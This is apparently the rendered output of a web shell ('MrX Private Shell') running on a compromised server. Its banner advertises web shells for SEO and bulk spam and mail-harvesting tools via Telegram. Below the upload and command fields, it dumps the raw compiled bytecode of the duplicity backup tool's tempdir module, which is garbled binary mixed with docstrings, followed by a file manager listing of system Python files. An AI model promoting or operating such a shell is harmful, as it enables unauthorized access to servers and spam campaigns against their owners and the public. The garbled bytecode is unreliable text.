__  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

[email protected]: ~ $
�

��g
*���SrSSKrSSKrSSKrSSKrSSKrSSKJr SSKJr SSKJ	r	 \R"5qSq\R"5qSr"SS\5rg)	z�
Provides temporary file handling cenetered around a single top-level
securely created temporary directory.

The public interface of this module is thread-safe.
�N)�config)�log)�utilc�2�[R5 [b[R5c4[	[
RS9q[R5[l[[R5 $![R5 f=f)aQ
Obtain the global default instance of TemporaryDirectory, creating
it first if necessary. Failures are propagated to caller. Most
callers are expected to use this function rather than
instantiating TemporaryDirectory directly, unless they explicitly
desdire to have their "own" directory for some reason.

This function is thread-safe.
)�temproot)
�_defaultLock�acquire�_defaultInstance�dir�TemporaryDirectoryrr�tempfile�tempdir�release���3/usr/lib/python3/dist-packages/duplicity/tempdir.py�defaultr0sf��������#�'7�';�';�'=�'E�1�6�?�?�K��/�3�3�5�H������������s�AB�Bc�L�\rSrSrSrS
SjrSrSrSrSr	S	r
S
rSrSr
g)r�Ha�
A temporary directory.

An instance of this class is backed by a directory in the file
system created securely by the use of tempfile.mkdtemp(). Said
instance can be used to obtain unique filenames inside of this
directory for cases where mktemp()-like semantics is desired, or
(recommended) an fd,filename pair for mkstemp()-like semantics.

See further below for the security implications of using it.

Each instance will keep a list of all files ever created by it, to
faciliate deletion of such files and rmdir() of the directory
itself. It does this in order to be able to clean out the
directory without resorting to a recursive delete (ala rm -rf),
which would be risky. Calling code can optionally (recommended)
notify an instance of the fact that a tempfile was deleted, and
thus need not be kept track of anymore.

This class serves two primary purposes:

Firstly, it provides a convenient single top-level directory in
which all the clutter ends up, rather than cluttering up the root
of the system temp directory itself with many files.

Secondly, it provides a way to get mktemp() style semantics for
temporary file creation, with most of the risks
gone. Specifically, since the directory itself is created
securely, files in this directory can be (mostly) safely created
non-atomically without the usual mktemp() security
implications. However, in the presence of tmpwatch, tmpreaper, or
similar mechanisms that will cause files in the system tempdir to
expire, a security risk is still present because the removal of
the TemporaryDirectory managed directory removes all protection it
offers.

For this reason, use of mkstemp() is greatly preferred above use
of mktemp().

In addition, since cleanup is in the form of deletion based on a
list of filenames, completely independently of whether someone
else already deleted the file, there exists a race here as
well. The impact should however be limited to the removal of an
'attackers' file.
Nc��SnUc,[R(a[RnO[n[U[5(a[
R"U5n[R"5RS5(aIU"U5(a<[R"SS/5n[
R"U5R5n[R"SSU5Ul[ R""[%S5UR-5 S	Ul0Ul[*R,"5Ulg)
z�
Create a new TemporaryDirectory backed by a unique and
securely created file system directory.

tempbase - The temp root directory, or None to use system
default (recommended).
c��[RRS5[RRS5/n[RRU5nUHnURU5(dM g g)z-Determine if path point to a MAcOS system tmpz/tmpz/var/tmpTF)�os�path�realpath�
startswith)r�	sys_temps�	user_temp�sys_temps    r�defaults_to_tmp�4TemporaryDirectory.__init__.<locals>.defaults_to_tmp�sh����� � ��(���� � ��,��I�
���(�(��.�I�%���'�'��1�1��&�rN�Darwin�getconf�DARWIN_USER_TEMP_DIRz-tempdirz
duplicity-zUsing temporary directory %sr)rr�_initialSystemTempRoot�
isinstance�bytesr�fsdecode�platform�systemr�
subprocess�check_output�rstripr
�mkdtemp�_TemporaryDirectory__dirr�Info�_�_TemporaryDirectory__tempcount�_TemporaryDirectory__pending�	threading�Lock�_TemporaryDirectory__lock)�selfrrs   r�__init__�TemporaryDirectory.__init__ws���	������!�?�?��2���h��&�&��{�{�8�,�H��?�?��'�'��1�1�o�h�6O�6O�!�.�.�	�;Q�/R�S�H��{�{�8�,�3�3�5�H��%�%�j�,��I��
�����1�2�T�Z�Z�?�@��������n�n�&��rc��UR$)z3
Returns the absolute pathname of the temp folder.
)r.�r6s rr�TemporaryDirectory.dir�s���z�z�rc�4�[bUR5 gg)z
Perform cleanup.
N)r
�cleanupr:s r�__del__�TemporaryDirectory.__del__�s��
�'��L�L�N�(rc��SnURR5 URS-UlS[UR53n[R
"[R"USUR55n[R"[S5[R"U5-5 SURU'URR5 U$!URR5 f=f)a
Return a unique filename suitable for use for a temporary
file. The file is not created.

Subsequent calls to this method are guaranteed to never return
the same filename again. As a result, it is safe to use under
concurrent conditions.

NOTE: mkstemp() is greatly preferred.
N��-zmktemp-z&Registering (mktemp) temporary file %s)r5r	r1�intr�fsencoder
�mktempr.r�Debugr0r'r2r)r6�filename�suffixs   rrE�TemporaryDirectory.mktemp�s�����������	"�#�/�/�!�3�D����T�-�-�.�/�0�F��{�{�8�?�?�6�9�d�j�j�#Q�R�H��I�I�a�@�A�B�K�K�PX�DY�Y�Z�'+�D�N�N�8�$��K�K���!����
�K�K���!�s�B'C!�!C=c��SnSnURR5 URS-UlS[UR53n[R
"USUR5up[R"[S5U-5 SURU'URR5 X4$!URR5 f=f)z�
Returns a filedescriptor and a filename, as per os.mkstemp(),
but located in the temporary directory and subject to tracking
and automatic cleanup.
NrArBzmkstemp-z'Registering (mkstemp) temporary file %s)r5r	r1rCr
�mkstempr.rrFr0r2r)r6�fdrGrHs    rrK�TemporaryDirectory.mkstemp�s�������������	"�#�/�/�!�3�D����T�-�-�.�/�0�F�#�+�+����
�
��L�B�
�I�I�a�A�B�X�M�N�'+�D�N�N�8�$��K�K���!��|���
�K�K���!�s�BB>�>Cc�X�UR5up[R"US5U4$)z^
Convenience wrapper around mkstemp(), with the file descriptor
converted into a file object.
zr+)rKr�fdopen)r6rLrGs   r�mkstemp_file�TemporaryDirectory.mkstemp_file�s'��
�|�|�~����y�y��T�"�H�,�,rc��URR5 XR;aD[R"[S5[R"U5-5 URU	O7[R"[S5[R"U5-5 URR5 g!URR5 f=f)a�
Forget about the given filename previously obtained through
mktemp() or mkstemp(). This should be called *after* the file
has been deleted, to stop a future cleanup() from trying to
delete it.

Forgetting is only needed for scaling purposes; that is, to
avoid n timefile creations from implying that n filenames are
kept in memory. Typically this whould never matter in
duplicity, but for niceness sake callers are recommended to
use this method whenever possible.
zForgetting temporary file %sz?Attempt to forget unknown tempfile %s - this is probably a bug.N)
r5r	r2rrFr0rr'�Warnr)r6�fnames  r�forget�TemporaryDirectory.forget�s���	
������	"����&��	�	�!�:�;�b�k�k�%�>P�P�Q��N�N�5�)�����\�]�`b�`k�`k�lq�`r�r�s���K�K���!��D�K�K���!�s�B
C�Cc�(�URR5 URb�[URR55HVn[R"S[R"U5-5 [R"[RU5 MX [R"UR5 SUlSUlURR#5 g![a1 [R"S[R"U5-5 M�f=f![a: [R "S[R"UR5-5 N�f=f!URR#5 f=f)z�
Cleanup any files created in the temporary directory (that
have not been forgotten), and clean up the temporary directory
itself.

On failure they are logged, but this method will not raise an
exception.
Nz+Removing still remembered temporary file %sz#Cleanup of temporary file %s failedzBCleanup of temporary directory %s failed - this is probably a bug.)r5r	r.�listr2�keysrrFrr'r�ignore_missing�unlink�	Exceptionr/�rmdirrSr)r6�files  rr=�TemporaryDirectory.cleanups+��	
������	"��z�z�%� ����!4�!4�!6�7�D���	�	�"O�RT�R]�R]�^b�Rc�"c�d��+�+�B�I�I�t�<�8���H�H�T�Z�Z�(�"&���!��
��K�K���!��%�����!F����UY�IZ�!Z�[����
!���H�H�\�_a�_j�_j�ko�ku�ku�_v�v���	��
�K�K���!�sU�3E5�AC0�"E5�' D.�E5�07D+�'E5�*D+�+E5�.AE2�/E5�1E2�2E5�5F)�__dir�__lock�	__pending�__tempcount)N)�__name__�
__module__�__qualname__�__firstlineno__�__doc__r7rr>rErKrPrUr=�__static_attributes__rrrrrHs1��,�\/'�b���4�4-�"�0"rr)rhrr(r*r
r3�	duplicityrrrr4rr
�
gettempdirr$r�objectrrrr�<module>rms\��,�
���������~�~�����"�,�,�.���0a"��a"r

Filemanager

Name Type Size Permission Actions
__init__.cpython-313.pyc File 398 B 0644
__main__.cpython-313.pyc File 4.74 KB 0644
argparse311.cpython-313.pyc File 98.99 KB 0644
backend.cpython-313.pyc File 32.15 KB 0644
backend_pool.cpython-313.pyc File 18.72 KB 0644
cached_ops.cpython-313.pyc File 1.09 KB 0644
cli_data.cpython-313.pyc File 32.01 KB 0644
cli_main.cpython-313.pyc File 14.13 KB 0644
cli_util.cpython-313.pyc File 22.31 KB 0644
config.cpython-313.pyc File 5.74 KB 0644
diffdir.cpython-313.pyc File 31.95 KB 0644
dup_collections.cpython-313.pyc File 63.51 KB 0644
dup_main.cpython-313.pyc File 78.6 KB 0644
dup_tarfile.cpython-313.pyc File 432 B 0644
dup_temp.cpython-313.pyc File 12.87 KB 0644
dup_time.cpython-313.pyc File 11.17 KB 0644
errors.cpython-313.pyc File 3.53 KB 0644
file_naming.cpython-313.pyc File 16.93 KB 0644
filechunkio.cpython-313.pyc File 3.83 KB 0644
globmatch.cpython-313.pyc File 6.01 KB 0644
gpg.cpython-313.pyc File 20.98 KB 0644
gpginterface.cpython-313.pyc File 25.69 KB 0644
lazy.cpython-313.pyc File 17 KB 0644
librsync.cpython-313.pyc File 11.48 KB 0644
log.cpython-313.pyc File 19.18 KB 0644
manifest.cpython-313.pyc File 23.66 KB 0644
patchdir.cpython-313.pyc File 27.63 KB 0644
path.cpython-313.pyc File 43.08 KB 0644
progress.cpython-313.pyc File 14.45 KB 0644
robust.cpython-313.pyc File 1.91 KB 0644
selection.cpython-313.pyc File 31.35 KB 0644
statistics.cpython-313.pyc File 18.78 KB 0644
tempdir.cpython-313.pyc File 12.04 KB 0644
util.cpython-313.pyc File 16.51 KB 0644
Filemanager